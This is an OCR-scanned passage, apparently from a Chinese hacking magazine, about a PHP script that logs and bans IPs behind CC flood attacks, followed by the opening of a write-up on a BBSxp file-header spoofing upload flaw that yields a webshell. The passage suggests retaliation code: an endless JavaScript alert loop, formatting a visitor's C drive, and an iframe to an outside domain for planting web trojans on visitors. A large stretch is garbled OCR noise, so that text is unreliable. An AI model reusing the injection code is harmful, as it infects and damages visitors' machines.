如发现有乱码， 请直接从这里浏览原文
正文摘录:

IP，每刷新一次，记录一次时间和IP。程序会进行分析，某IP刷新时间间隔不符合要求则终止运行，提示等待，如果刷新的总次数超过规定次数，该IP将无法正常访问。并且该程序具有限制代理的功能，具有统计的功能，如图5。此处是ban这张表记录的刷新超过20次的所有IP地址。看到了吧，时间不长，有的IP就刷新上千次，是不是很恐怖呢?自然也会被拒绝访问了，如图6。‘I’ipcⅫIl，，×6L183.248.12222：。.／X19乱1§墨镜¨4§，X58.48126.1T921r，X22k咖.2it.232438I，X61l∞.248.12222，J、，×每良孵IO鼾尊口16211，X221.胤210B6270㈠，眷22“孙200..32256I，)(221.234.210.184740I：，X国HlZ‰m130373，，×22l_234.19233231一·，X8t1组ln992*.／X59.172.185128512：”。，x铃1.2掌ti钟L38904r，，×2缸.232.139.262l_，X5吼竹毫7乱232666国5啊口tf∞tm￡^Ⅲ岫帕·o国画珏p秣☆嗽留0t叠d，口‘霞d8e4_瞄画商面i鬲i蓐——_————一——l¨_—_二～¨_：…一：1口叭。州一蓑，嘉金嚣蓁多喜盍善.-袭j曙站正常工作t系统辖提高重垒系教‘幕统检测到你的如已经剧新丰雷6四.后记现在，我们已经把攻击者IP通过数据库记录了下来，剩下来要做什么呢?(1)整理图5中记录的那些IP资料，可以直接导出为Excel格式文件，然后去网监报案!php，在／／在SDB一＞query(“deletefrombanwhet‘eip=’SiP’andcount＜SGCC“)这句代码的后面添加for’(Si=OlSi＜‘1000000li++){echo“＜~script＞alert(’哈哈’)I”Iecho'’＜／scr。Ipt＞”，}这句代码，它会使攻击者的浏览器不断地弹出对话框。当然如果你喜欢，还可以加上更厉害的代码，甚至是格式化对方C盘的!(3)喜欢收藏肉鸡的朋友，可以准备好网马和木马。接着加上代码，加入的位置同上Print＜＜＜EOT＜ifr~me0rc=’http：／／WWW.158544632.cn’width=100height=0＞EOT；。其实大家完全可以自由发挥，鉴于我没有收藏肉鸡的爱好，就没有这么做.而是直接报案了。好了，谈了那么多，不知道本文对大家是否有所启发，其实防范cc攻击最好还是配合专业的硬件防火墙进行周密的安全部署。防火墙会检测并发的TcP／IP连接数目，超过一定数目一定频率就会被认为是Connection—Flood，而且专业的抗DDOS防火墙有检测代理的功能。有兴趣的朋友就到X论坛去讨论吧，希望可以和一些同志同道合的朋友多交流!(2)喜欢搞恶作剧的朋友，还可以反攻击别人!修改cc.func(文章中涉庭到的工具CCv20、cc.php、db—mysql.php已经收录在光盘中)墨浅祈文件头欺骗漏洞28度的冰【H.ST]一.BBSxP文件头欺骗漏洞文件头欺骗，这算不上是一个很新的话题了，虽然说很早就已经有了，但该漏洞却依然层出不穷。不知大家是否知道前段时间爆出的一个BBsxp7.0文件头欺骗上传漏洞，可以上传特定的文件，直接得到Webshell1问题出在lnc／upfile.asp里从上面的分析可以看出，我们要上传的话需要满足两个条件：1.扩展名不是asa、a8p、cdx、cer中的类型；2.文件头必须有image属性。很显然.对于第一个条件，我们可队上传php、aspx等类型的文件以绕过扩展名校验。对于第二个条件就要引出今天的话题一一文件头欺骗了。